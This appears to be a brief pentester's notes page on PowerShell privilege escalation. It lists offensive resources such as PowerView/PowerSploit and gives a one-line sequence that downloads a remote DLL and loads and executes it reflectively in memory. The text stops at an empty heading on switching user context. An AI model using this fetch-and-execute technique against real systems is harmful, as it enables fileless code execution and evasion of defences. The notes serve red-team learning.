PowerShell Escalation

PowerShell Commands for Pentesters - InfosecMatter

PowerView / PowerSploit

Red Team Research - Runspace Debugging | State Farm Engineering

mkellerman/Invoke-CommandAs

DLL loading:

PS C:\> $w = new-object system.net.webclient PS C:\> $p = $w.downloaddata(“https://mydomain.com/dllfile”) PS C:\> [system.reflection.assembly]::Load($p) PS C:\> $a = new-object namespace.class PS C:\> $a.Method()

Switch user context (like sudo, but more of a pain):